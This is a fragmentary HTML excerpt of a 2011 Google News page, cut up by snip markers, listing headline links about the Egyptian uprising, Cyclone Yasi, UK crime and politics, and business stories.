<div class="thumbnail" style=""><a target="_blank" href="http://www.thehindu.com/news/international/article1153131.ece" class="usg-AFQjCNHeRAEi7-qEj6q_O0JybWgWW6gHBA " title="The Hindu"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/50n9-xziJbkjaM/0.jpg" width="80" height="65"></a> <div class="source "> <a target="_blank" href="http://www.thehindu.com/news/international/article1153131.ece" class="usg-AFQjCNHeRAEi7-qEj6q_O0JybWgWW6gHBA "> The Hindu </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGTsGUhf6requtx9dRSYwdsHNYEvg " href="http://www.cbc.ca/world/story/2011/02/03/egypt-clashes-mubarak.html" id="MAA4AEgAUABgAWoCdWt6AWg"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=GLUorDt_bTA">Video:&nbsp;
MAP: Clashes in the heart of Cairo
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://english.aljazeera.net/news/middleeast/2011/02/201123175837480777.html" target="_blank" class="usg-AFQjCNH2fUV6kPluOgP98rPgNobHihW76A " id="MAA4AEgAUAFgAmoCdWt6AWg">The battle for Tahrir Square</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGkRYNOyz_GaGL1DYmZiCz5aDMUvg " href="http://news.sky.com/skynews/Home/World-News/Egypt-Crisis-10-Protesters-Killed-In-Cairos-Tahrir-Square-As-New-Skirmishes-Commence/Article/201102115921829?lpos=World_News_Top_Stories_Header_0&amp;lid=ARTICLE_15921829_Egypt_Crisis%3A_10_Protesters_Killed_In_Cairos_Tahrir_Square_As_New_Skirmishes_Commence" id="MAA4AEgAUANgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH1K-DHY78yY1MH2BmhEBBV1xYJNQ " href="http://www.telegraph.co.uk/news/worldnews/africaandindianocean/egypt/8301799/Bloody-clashes-in-Cairo.html" id="MAA4AEgAUARgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFG_TnqwKdoD_5A4A_Q1sA0n59Lbg " href="http://edition.cnn.com/2011/WORLD/africa/02/03/egypt.journalists/?hpt=C1" id="MAA4AEgAUAVgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGjxlTXZvOp0G_wmuE3Mol8YJnlwA " href="http://www.reuters.com/article/2011/02/03/us-egypt-usa-idUSTRE71175920110203?feedType=RSS&amp;feedName=topNews" id="MAA4AEgAUAZgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/uk/2011/feb/03/jewellery-gang-court-flying-squad" class="usg-AFQjCNHeYByVm2OpXT0GGRh5ab8tlfCTbw " title="The Guardian"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/jGL4rz8frb7m7M/0.jpg" width="80" height="48"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/uk/2011/feb/03/jewellery-gang-court-flying-squad" class="usg-AFQjCNHeYByVm2OpXT0GGRh5ab8tlfCTbw "> The Guardian </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHeYByVm2OpXT0GGRh5ab8tlfCTbw " href="http://www.guardian.co.uk/uk/2011/feb/03/jewellery-gang-court-flying-squad" id="MAA4AEgBUABgAWoCdWt6AWg"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.telegraph.co.uk/news/uknews/crime/8301092/Men-in-White-gang-sentenced-for-3.5m-crimewave.html" target="_blank" class="usg-AFQjCNF_lfniJxGkjg4Zt_qziqZ2kiJ9VQ " id="MAA4AEgBUAJgAmoCdWt6AWg">&#39;Men in White&#39; gang sentenced for ..3.5m crimewave</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHly6yUgwtOlYZufugSGGlfZcBKnw " href="http://www.dailymail.co.uk/news/article-1353356/Robbery-gang-raided-dozens-jewellery-stores-jailed-total-140-years.html" id="MAA4AEgBUANgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDawL-kh9D3yKjFI0EMrGw7X9GwA " href="http://rss.thisislondon.co.uk/c/365/f/9944/s/1273c49d/l/0L0Sthisislondon0O0Cstandard0Carticle0E23920A1990Ethe0Earmed0Erobbers0Ewho0Estruck0Eevery0Efortnight0Efor0E160Emonths0Bdo/story01.htm" id="MAA4AEgBUARgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFYB0JotMhfOj9uaxxwyDj_E7seqQ " href="http://www.oyetimes.com/news/england/9232-organized-diamond-jewellery-robbers-jailed-in-london" id="MAA4AEgBUAVgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhYohJIrkPjirmpt9wd30iPTwGlg " href="http://www.getsurrey.co.uk/news/s/2086790_video__robberies_gang_jailed_for_jewellery_raids" id="MAA4AEgBUAZgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.dailymail.co.uk/news/article-1353390/Cameron-snubbed-Liverpool-city-pulls-Big-Society-protest-cuts.html" class="usg-AFQjCNFOrFx5iSyuRVkE7qzyoSa6NF_v-w " title="Daily Mail"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/9q370YJjsgU9mM/0.jpg" width="44" height="80"></a> <div class="source "> <a target="_blank" href="http://www.dailymail.co.uk/news/article-1353390/Cameron-snubbed-Liverpool-city-pulls-Big-Society-protest-cuts.html" class="usg-AFQjCNFOrFx5iSyuRVkE7qzyoSa6NF_v-w "> Daily Mail </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFGaRy_eMXu_3R3DyROhn_kwatSjQ " href="http://uk.reuters.com/article/2011/02/03/uk-britain-bigsociety-idUKTRE7127KK20110203" id="MAA4AEgCUABgAWoCdWt6AWg"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.dailymail.co.uk/news/article-1353390/Cameron-snubbed-Liverpool-city-pulls-Big-Society-protest-cuts.html" target="_blank" class="usg-AFQjCNFOrFx5iSyuRVkE7qzyoSa6NF_v-w " id="MAA4AEgCUAFgAmoCdWt6AWg">Cameron snubbed by Liverpool as city pulls out of Big Society in protest at cuts</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bbc.co.uk/go/rss/int/news/-/news/uk-england-merseyside-12357450" target="_blank" class="usg-AFQjCNHc_dy5_Nm2CO8IEbL8UzAuTG4ANA " id="MAA4AEgCUAJgAmoCdWt6AWg">Liverpool rejects &#39;big society&#39;</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGgC4rZE_T_2Cf4kE--SwNdDhJQ1g " href="http://www.guardian.co.uk/society/2011/feb/03/liverpool-big-society" id="MAA4AEgCUANgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF8D_7oaOvg3uiYKCZ9NiwIrqoSDQ " href="http://www.spectator.co.uk/coffeehouse/6669468/body-blow-for-the-big-society.thtml" id="MAA4AEgCUAVgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHS3Z7mMvKcKPHotlDuI8JAfCa9CA " href="http://www.yourlocalguardian.co.uk/news/8832509.Sutton_Council_to_stay_in__big_society__as_Liverpool_withdraws/" id="MAA4AEgCUAZgCGoCdWt6AWg"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFTjEwWnW58-MU704fOPiX5RDWtPA " href="http://www.ft.com/cms/s/0/2e946c6a-2fd2-11e0-91f8-00144feabdc0.html" id="3909192993161163203"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHgzhFS2fN12AMSttb2_O4C_36F9A " href="http://www.pcmag.com/article2/0,2817,2379325,00.asp" id="-2733022605605730640"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFHyK9tDxD-860e9SxTM4J6Rb74jA " href="http://www.goal.com/en-gb/news/2896/premier-league/2011/02/03/2335873/goalcom-uk-poll-results-liverpools-luis-suarez-is-the-best" id="-4759838050971633965"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEsMY3za2OdC8Ky5rGxAvWNuzXFgg " href="http://www.guardian.co.uk/uk/2011/feb/03/human-bse-blood-test" id="7537409241680449248"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFlybXsy3pBZa5iBmv5EllLIrFiYA " href="http://www.nature.com/news/2011/110202/full/news.2011.65.html" id="-1277433794847590566"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGGADMeiWJkro1Edt0YFluddvsFug " href="http://www.smh.com.au/environment/weather/cyclone-yasi-weakens-to-tropical-depression-20110201-1acgp.html" id="-1974607544689906154"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHMqURuh45zuW_UjPIsTqyc5SVXFg " href="http://www.guardian.co.uk/uk/2011/feb/03/ann-summers-jacqueline-gold-poison-nanny" id="3690507281939835263"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/world/story/2011/02/03/yemen-protest-presidnet.html" class="usg-AFQjCNGBvgd9KttWkPbd8fW3mlth1DEXPg " title="CBC.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/_1pX9U_tpn5BvM/0.jpg" width="53" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/world/story/2011/02/03/yemen-protest-presidnet.html" class="usg-AFQjCNGBvgd9KttWkPbd8fW3mlth1DEXPg "> CBC.ca </a>
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=eb7-Y1LSXfc">Video:&nbsp;
YEMEN: 'Day of Rage' draws Yemeni protesters onto streets
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEpvy5rodpljVnb7bTatfJHuvh4BA " href="http://www.cnn.com/2011/WORLD/meast/02/03/egypt.protests.region/" id="MAA4AUgAUANgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGFxZEKPsbKzukZWuobWHiX3xH4QQ " href="http://www.reuters.com/article/2011/02/03/us-yemen-groups-idUSTRE7123P820110203" id="MAA4AUgAUARgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEFDi7IhoKKJ8e6gWAAKkFA-RCJNw " href="http://www.telegraph.co.uk/news/worldnews/middleeast/yemen/8300640/Thousands-of-Yemeni-protesters-stage-show-of-force-in-capital.html" id="MAA4AUgAUAVgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNET8gHmK8M16tNLW2b_KAUlku5hfA " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12353479" id="MAA4AUgAUAZgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/australiaandthepacific/australia/8300916/Cyclone-Yasi-Queensland-escapes-wrath-of-super-storm.html" class="usg-AFQjCNHaR0fluA5QL1fTct8SJEezPZbtvA " title="Telegraph.co.uk"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/JnnaHKNldiUppM/0.jpg" width="80" height="50"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/australiaandthepacific/australia/8300916/Cyclone-Yasi-Queensland-escapes-wrath-of-super-storm.html" class="usg-AFQjCNHaR0fluA5QL1fTct8SJEezPZbtvA "> Telegraph.co.uk </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGGADMeiWJkro1Edt0YFluddvsFug " href="http://www.smh.com.au/environment/weather/cyclone-yasi-weakens-to-tropical-depression-20110201-1acgp.html" id="MAA4AUgBUABgAWoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=DouDTpmQr2Q">Video:&nbsp;
AUSTRALIA : Cyclone Yasi wreaks 'phenomenal devastation'
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/feb/03/cyclone-yasi-australia-queensland-storm" target="_blank" class="usg-AFQjCNFHOk08KjdUOClCwqFZzet9E4EEgg " id="MAA4AUgBUAFgAmoCdWt6AXc">Queensland breathes sigh of relief as cyclone Yasi passes</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHqZ7vnpyJJoNjYMpyTj4cfeoiE7w " href="http://www.cbc.ca/world/story/2011/02/03/australia-cyclone-yasi.html" id="MAA4AUgBUANgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHW6Hrted_QM9tBXUxVxQdXBA2StQ " href="http://voices.washingtonpost.com/capitalweathergang/2011/02/queensland_australia_slammed_b.html" id="MAA4AUgBUARgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHC2mNwCKn2rTbubhof24yM-XrpwQ " href="http://www.bloomberg.com/news/2011-02-03/sugar-falls-after-tropical-cyclone-yasi-crosses-growing-areas-in-australia.html" id="MAA4AUgBUAVgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJuGfYWoltPzeLPUTGNr1MBikWfw " href="http://travel.usatoday.com/destinations/dispatches/post/2011/02/australian-tourism-takes-a-hit-from-cyclone-yasi/141480/1" id="MAA4AUgBUAZgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/crisis-in-egypt/islamists-come-late-to-the-party-in-egyptian-uprising/article1889586/" class="usg-AFQjCNGRZPbYTQ5VSYNuiSd22yLpGR8uug " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/sUeR0P7DEcTPEM/0.jpg" width="80" height="66"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/crisis-in-egypt/islamists-come-late-to-the-party-in-egyptian-uprising/article1889586/" class="usg-AFQjCNGRZPbYTQ5VSYNuiSd22yLpGR8uug "> Globe and Mail </a>
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=w4HCZHvOBo8">Video:&nbsp;
Muslim Brotherhood blames Israel for Egyptian unrest
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/commentisfree/2011/feb/03/egypt-muslim-brotherhood-west-democracy" target="_blank" class="usg-AFQjCNH3PT5oZkTTu184Y3L98sPkbl1QWQ " id="MAA4AUgCUAFgAmoCdWt6AXc">The west must be wary of Egypt&#39;s Muslim Brotherhood</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNETNeguKnZyvadyB5i43rtRk1DuTQ " href="http://www.foxnews.com/world/2011/02/03/opposition-groups-egypt-varied-conflicting-agendas/" id="MAA4AUgCUANgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFe3z4H0MAtMwYfjJWTBt95C0x37A " href="http://seattletimes.nwsource.com/html/nationworld/2014119456_apmlegyptislamicmilitants.html" id="MAA4AUgCUARgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxg0Ihhw7SZGz0-MM4i_BE3txN-Q " href="http://www.ft.com/cms/s/047884de-2e56-11e0-8733-00144feabdc0.html" id="MAA4AUgCUAVgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGG6CzTFx2XzCdbGk_iDkJ9IUcT7g " href="http://www.reuters.com/article/2011/02/01/idINIndia-54562220110201" id="MAA4AUgCUAZgCGoCdWt6AXc"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/politics/2011/feb/03/commons-leader-attacks-mps-expenses-watchdog" class="usg-AFQjCNHw1B8M3wq2sL2IWvF9RuwTeXXr3Q " title="The Guardian"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/vbBMKMskyLbyiM/0.jpg" width="80" height="48"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/politics/2011/feb/03/commons-leader-attacks-mps-expenses-watchdog" class="usg-AFQjCNHw1B8M3wq2sL2IWvF9RuwTeXXr3Q "> The Guardian </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEkOh4MtN8V3Eo8z7pJ4htLdQr0rQ " href="http://www.telegraph.co.uk/news/newstopics/mps-expenses/8302203/MPs-expenses-Just-sort-it-out.html" id="MAE4AUgAUABgAWoCdWt6AW4"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bbc.co.uk/go/rss/int/news/-/news/uk-politics-12356335" target="_blank" class="usg-AFQjCNGp3L-wNrq2sqe3dPGdvlmnB7EEiA " id="MAE4AUgAUAFgAmoCdWt6AW4">Expenses battle</a>
...[SNIP]...
<div class="aa-inner"><a href="http://news.sky.com/skynews/Home/Politics/MPs-Expenses-Claimed-Between-Sept-And-Oct-2010-Published-By-Parliamentary-Standards-Authority/Article/201102115921875?lpos=Politics_Top_Stories_Header_3&amp;lid=ARTICLE_15921875_MPs_Expenses_Claimed_Between_Sept_And_Oct_2010_Published_By_Parliamentary_Standards_Authority" target="_blank" class="usg-AFQjCNEXQAnCyQ2CvkPg5YfP8-xJQgenjA " id="MAE4AUgAUAJgAmoCdWt6AW4">MPs&#39; Rejected Expenses Revealed</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHw1B8M3wq2sL2IWvF9RuwTeXXr3Q " href="http://www.guardian.co.uk/politics/2011/feb/03/commons-leader-attacks-mps-expenses-watchdog" id="MAE4AUgAUANgCGoCdWt6AW4"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGsO1xKvN7vhIWmnOapoAiHv8dyrQ " href="http://online.wsj.com/article/SB10001424052748703652104576122163817185764.html" id="MAE4AUgAUAVgCGoCdWt6AW4"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGvtdOAa2Wb8uotfu9T0Qcb2kDfCg " href="http://www.dailymail.co.uk/news/article-1353207/MPs-thousands-pounds-expenses-claims-rejected.html" id="MAE4AUgAUAZgCGoCdWt6AW4"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/news/uknews/crime/8301787/Nanny-admits-attempting-to-poison-Ann-Summers-boss-Jacqueline-Gold.html" class="usg-AFQjCNGlRkICs6cFHsnWGGOF-goZZbyLfQ " title="Telegraph.co.uk"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/zcIb9qdomynq9M/0.jpg" width="80" height="50"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/news/uknews/crime/8301787/Nanny-admits-attempting-to-poison-Ann-Summers-boss-Jacqueline-Gold.html" class="usg-AFQjCNGlRkICs6cFHsnWGGOF-goZZbyLfQ "> Telegraph.co.uk </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHMqURuh45zuW_UjPIsTqyc5SVXFg " href="http://www.guardian.co.uk/uk/2011/feb/03/ann-summers-jacqueline-gold-poison-nanny" id="MAE4AUgBUABgAWoCdWt6AW4"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbc.ca/world/story/2011/02/03/uk-sex-shop-poison.html" target="_blank" class="usg-AFQjCNEKJRoCo07ImotArwKT4J7XUza3KA " id="MAE4AUgBUAFgAmoCdWt6AW4">UK sex shop kingpin&#39;s nanny guilty in poisoning</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.telegraph.co.uk/news/uknews/crime/8301787/Nanny-admits-attempting-to-poison-Ann-Summers-boss-Jacqueline-Gold.html" target="_blank" class="usg-AFQjCNGlRkICs6cFHsnWGGOF-goZZbyLfQ " id="MAE4AUgBUAJgAmoCdWt6AW4">Nanny admits attempting to poison Ann Summers boss</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF6sPbffe2o5TI75GtwP9GPgqbeUA " href="http://news.sky.com/skynews/Home/UK-News/Nanny-Admits-Trying-to-Poison-Ann-Summers-Boss-Jacqueline-Gold/Article/201102115922324?lpos=UK_News_First_UK_News_Article_Teaser_Region_0&amp;lid=ARTICLE_15922324_Nanny_Admits_Trying_to_Poison_Ann_Summers_Boss_Jacqueline_Gold" id="MAE4AUgBUANgCGoCdWt6AW4"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZeGivhvBTEZ8Ta04-tbWBVOABwg " href="http://www.miltonkeynes.co.uk/news/woman_admits_gold_poison_bid_1_2378152" id="MAE4AUgBUARgCGoCdWt6AW4"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEJpolSaMWtCJBJrMiLaQD01vCtBg " href="http://www.metro.co.uk/news/854594-nanny-plotted-to-poison-ann-summers-boss" id="MAE4AUgBUAVgCGoCdWt6AW4"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/news/uknews/terrorism-in-the-uk/8301307/Britain-has-become-a-safe-haven-for-foreign-terrorists-Lord-Carlile-warns.html" class="usg-AFQjCNH8wrGlVKuxkD6TTiebAAh7K_U0Rg " title="Telegraph.co.uk"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/a7HgcK1RFQ8zHM/0.jpg" width="80" height="50"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/news/uknews/terrorism-in-the-uk/8301307/Britain-has-become-a-safe-haven-for-foreign-terrorists-Lord-Carlile-warns.html" class="usg-AFQjCNH8wrGlVKuxkD6TTiebAAh7K_U0Rg "> Telegraph.co.uk </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEameZdXWPs8Yhl8W5uDmEeMrQedw " href="http://www.telegraph.co.uk/news/uknews/terrorism-in-the-uk/8302100/Rights-of-terrorists-suspects-have-now-overtaken-those-of-the-general-public.html" id="MAE4AUgCUABgAWoCdWt6AW4"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/law/2011/feb/03/control-orders-replacement-public-protection" target="_blank" class="usg-AFQjCNE9-964MgZrPYyj3fTj9WqqZcne2A " id="MAE4AUgCUAFgAmoCdWt6AW4">Control orders replacement does much the same job, says Lord Carlile</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bbc.co.uk/go/rss/int/news/-/news/uk-politics-12356563" target="_blank" class="usg-AFQjCNFEG-2Pj27OBBGVGrxmWfxSl-6WBA " id="MAE4AUgCUAJgAmoCdWt6AW4">UK terror suspects&#39; &#39;safe haven&#39;</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEWg_Am-H7qrBdS5zqt1RWQxHnoiQ " href="http://www.thisislondon.co.uk/standard/article-23920276-terror-phone-tap-evidence-is-risk-to-safety.do" id="MAE4AUgCUANgCGoCdWt6AW4"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHmbaqHv9ST1VFeyU6nJMUbLmLDfg " href="http://www.amnesty.org.uk/news_details.asp?NewsID=19226" id="MAE4AUgCUAVgCGoCdWt6AW4"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ifaonline.co.uk/professional-adviser/news/2024031/sherborne-wins-battle-oust-board" class="usg-AFQjCNGPlY4_vN9IFwui-X5ds1TA_w8Wvg " title="ifaonline.co.uk"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/daIgoIWd7QI9HM/0.jpg" width="80" height="49"></a> <div class="source "> <a target="_blank" href="http://www.ifaonline.co.uk/professional-adviser/news/2024031/sherborne-wins-battle-oust-board" class="usg-AFQjCNGPlY4_vN9IFwui-X5ds1TA_w8Wvg "> ifaonline.co.uk </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFTjEwWnW58-MU704fOPiX5RDWtPA " href="http://www.ft.com/cms/s/0/2e946c6a-2fd2-11e0-91f8-00144feabdc0.html" id="MAA4AkgAUABgAWoCdWt6AWI"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/business/2011/feb/03/f-and-c-takeover-comment" target="_blank" class="usg-AFQjCNEE9bxdLKjWkswlLq4fPrRqmUhICg " id="MAA4AkgAUAFgAmoCdWt6AWI">F&amp;C bloodletting has only just begun</a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703652104576121983684945442.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNELDkNWwc5dubmY14Pq_oWF8d8ZPA " id="MAA4AkgAUAJgAmoCdWt6AWI">Activist Investor Wins F&amp;C Boardroom Battle</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHMS74S1LDJRcQ3Z2MaHx9lGpBmcQ " href="http://www.bloomberg.com/news/2011-02-03/f-c-chairman-ousted-as-activist-investor-sherborne-wins-shareholder-vote.html" id="MAA4AkgAUANgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHdhOkd_n4xLoyIzS-Hlpl8uMZ-jg " href="http://www.sharecast.com/cgi-bin/sharecast/story.cgi?story_id=4024105" id="MAA4AkgAUARgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGrLOwu0LFjdTcIpp-CW2Fthrsygg " href="http://www.reuters.com/article/2011/02/03/fc-sherborne-idUSLDE7120LO20110203" id="MAA4AkgAUAVgCGoCdWt6AWI"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/business/2011/feb/03/shell-search-for-profits-widens" class="usg-AFQjCNGzTgHg6Q_41JdOvDqHbaI0Aff7Bg " title="The Guardian"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/FCQGPunkKLHTzM/0.jpg" width="80" height="48"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/business/2011/feb/03/shell-search-for-profits-widens" class="usg-AFQjCNGzTgHg6Q_41JdOvDqHbaI0Aff7Bg "> The Guardian </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGzTgHg6Q_41JdOvDqHbaI0Aff7Bg " href="http://www.guardian.co.uk/business/2011/feb/03/shell-search-for-profits-widens" id="MAA4AkgBUABgAWoCdWt6AWI"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-02-03/shell-no-beaufort-sea-drilling-in-arctic-for-2011.html" target="_blank" class="usg-AFQjCNG0XCHXYK1r1vRCuxmo23p8Oem_aQ " id="MAA4AkgBUAFgAmoCdWt6AWI">Shell: No Beaufort Sea drilling in Arctic for 2011</a>
...[SNIP]...
